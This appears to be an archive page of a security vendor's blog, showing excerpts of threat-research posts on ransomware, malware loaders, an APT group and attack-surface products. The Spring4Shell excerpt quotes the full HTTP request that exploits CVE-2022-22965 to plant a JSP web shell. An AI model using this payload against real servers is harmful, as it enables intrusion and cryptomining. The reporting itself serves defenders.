Cloud-Native App Security Platform

Cloud-Native App Security Platform

The cloud is driving transformative benefits for global organizations. But in rushing their applications and infrastructure into new computing environments, they’re also exposing business-critical data to new risks. There are now more ways for the bad guys to steal data, deploy malware, hijack resources, and hold them to ransom. The complexity of hybrid and multi-cloud environments and the need to coordinate across multiple stakeholder groups further compound these challenges. The answer is a simple, flexible,…

Read More

Examining the Black Basta Ransomware’s Infection Routine

Examining the Black Basta Ransomware’s Infection Routine

Examining the Black Basta Ransomware’s Infection Routine Ransomware We analyze the Black Basta ransomware and examine the malicious actor’s familiar infection tactics. By: Ieriz Nicolle Gonzalez, Ivan Nicole Chavez, Katherine Casona, Nathaniel Morales May 09, 2022 Read time:  ( words) Black Basta, a new ransomware gang, has swiftly risen to prominence in recent weeks after it caused massive breaches to organizations in a short span of time. On April 20, 2022, a user named Black…

Read More

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service Malware This report focuses on the components and infection chain ⁠of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver. By: Aliakbar Zahravi, Leandro Froes May 05, 2022 Read time:  ( words) We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

Read More

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Conclusion While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver…

Read More

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Read More

Here’s a Path to Better Attack Surface Risk Management

Here’s a Path to Better Attack Surface Risk Management

So, how can security leaders stay on top of their attack surface and ahead of the bad guys? By leveraging a unified cybersecurity platform that enables continuous security visibility and monitoring across the discovery, assessment, and mitigation phases of the attack surface risk lifecycle. Let’s dive deeper into how a platform can enhance attack surface risk management versus utilizing point products. Discover your digital attack surface First, you need total visibility to be able to…

Read More

Attack Surface Management Partner Bit Discovery Bolsters Offering

Attack Surface Management Partner Bit Discovery Bolsters Offering

Security starts with visibility: you can’t protect what you can’t see. And yet, this is a perennial problem in cybersecurity. We’re excited to bring attack surface discovery capabilities to the Trend Micro One platform, providing ongoing visibility to internal assets (devices, identities, applications) but also external, Internet-facing assets. And we’re doing the latter in partnership with Bit Discovery, an innovative start-up founded by Jeremiah Grossman (previously co-founder of WhiteHat Security). How bad is the attack…

Read More

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Read More

Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics) Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade. This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.  DDS is integral in embedded systems that…

Read More

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

An Investigation of the BlackCat Ransomware via Trend Micro Vision One Ransomware We recently investigated a case related to the BlackCat ransomware group using the Trend Micro Vision One™ platform, which comes with extended detection and response (XDR) capabilities. BlackCat (aka AlphaVM or AlphaV) is a ransomware family created in the Rust programming language and operated under a ransomware-as-a-service (RaaS) model. By: Lucas Silva, Leandro Froes April 18, 2022 Read time:  ( words) We recently…

Read More
1 15 16 17 18 19 27